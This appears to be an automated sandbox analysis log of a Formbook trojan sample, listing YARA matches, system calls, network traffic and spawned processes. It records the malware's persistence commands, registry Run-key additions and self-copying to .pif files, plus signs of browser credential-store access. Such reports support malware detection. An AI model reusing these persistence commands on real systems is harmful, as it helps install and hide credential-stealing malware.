            Source: findstr.exe, 00000012.00000003.2696450717.0000000007C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: findstr.exe, 00000012.00000002.3330731863.000000000426A000.00000004.10000000.00040000.00000000.sdmp, NQKKZTlEHzDNbnTfYhwoCSpWHN.exe, 0000001B.00000002.3339127333.0000000003C0A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49704 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49716 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49724 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49726 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49738 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49750 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49754 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49756 version: TLS 1.2

            E-Banking Fraud

            Source: Yara match, File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_0042B593 NtClose,7_2_0042B593
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72B60 NtClose,LdrInitializeThunk,7_2_02F72B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02F72C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02F72DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F735C0 NtCreateMutant,LdrInitializeThunk,7_2_02F735C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F74340 NtSetContextThread,7_2_02F74340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F74650 NtSuspendThread,7_2_02F74650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72AF0 NtWriteFile,7_2_02F72AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72AD0 NtReadFile,7_2_02F72AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72AB0 NtWaitForSingleObject,7_2_02F72AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72BF0 NtAllocateVirtualMemory,7_2_02F72BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72BE0 NtQueryValueKey,7_2_02F72BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72BA0 NtEnumerateValueKey,7_2_02F72BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72B80 NtQueryInformationFile,7_2_02F72B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72EE0 NtQueueApcThread,7_2_02F72EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72EA0 NtAdjustPrivilegesToken,7_2_02F72EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72E80 NtReadVirtualMemory,7_2_02F72E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72E30 NtWriteVirtualMemory,7_2_02F72E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72FE0 NtCreateFile,7_2_02F72FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72FB0 NtResumeThread,7_2_02F72FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72FA0 NtQuerySection,7_2_02F72FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72F90 NtProtectVirtualMemory,7_2_02F72F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72F60 NtCreateProcessEx,7_2_02F72F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72F30 NtCreateSection,7_2_02F72F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72CF0 NtOpenProcess,7_2_02F72CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72CC0 NtQueryVirtualMemory,7_2_02F72CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72CA0 NtQueryInformationToken,7_2_02F72CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72C60 NtCreateKey,7_2_02F72C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72C00 NtQueryInformationProcess,7_2_02F72C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72DD0 NtDelayExecution,7_2_02F72DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72DB0 NtEnumerateKey,7_2_02F72DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72D30 NtUnmapViewOfSection,7_2_02F72D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72D10 NtMapViewOfSection,7_2_02F72D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F72D00 NtSetInformationFile,7_2_02F72D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F73090 NtSetValueKey,7_2_02F73090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F73010 NtOpenDirectoryObject,7_2_02F73010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F739B0 NtGetContextThread,7_2_02F739B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F73D70 NtOpenThread,7_2_02F73D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 7_2_02F73D10 NtOpenProcessToken,7_2_02F73D10
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif 9732F930CD31110F63AAF92CC17895B65303BB06A4968B127F4687270941ACDD
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408
            Source: 4Ear91jgQ7.exe, 00000000.00000002.2130989636.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 4Ear91jgQ7.exe
            Source: 4Ear91jgQ7.exe, 00000000.00000000.2061403206.0000000000472000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameElaniabdv.exe4 vs 4Ear91jgQ7.exe
            Source: 4Ear91jgQ7.exeBinary or memory string: OriginalFilenameElaniabdv.exe4 vs 4Ear91jgQ7.exe
            Source: 4Ear91jgQ7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3323294079.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3320583802.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001B.00000002.3345359746.00000000057A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2374263297.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2373373452.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.3323096019.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.3325539754.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.2388313008.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@105/17@12/5
            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Documents\4Ear91jgQ7.pif
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifMutant created: NULL
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6476
            Source: C:\Windows\SysWOW64\findstr.exeFile created: C:\Users\user\AppData\Local\Temp\H0840I45
            Source: 4Ear91jgQ7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 4Ear91jgQ7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: findstr.exe, 00000012.00000003.2687575983.0000000003186000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2687454073.0000000003166000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.00000000031B2000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000003.2692313345.000000000318F000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000012.00000002.3323855637.0000000003186000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4Ear91jgQ7.exeReversingLabs: Detection: 13%
            Source: unknownProcess created: C:\Users\user\Desktop\4Ear91jgQ7.exe "C:\Users\user\Desktop\4Ear91jgQ7.exe"
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Desktop\4Ear91jgQ7.exe" "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
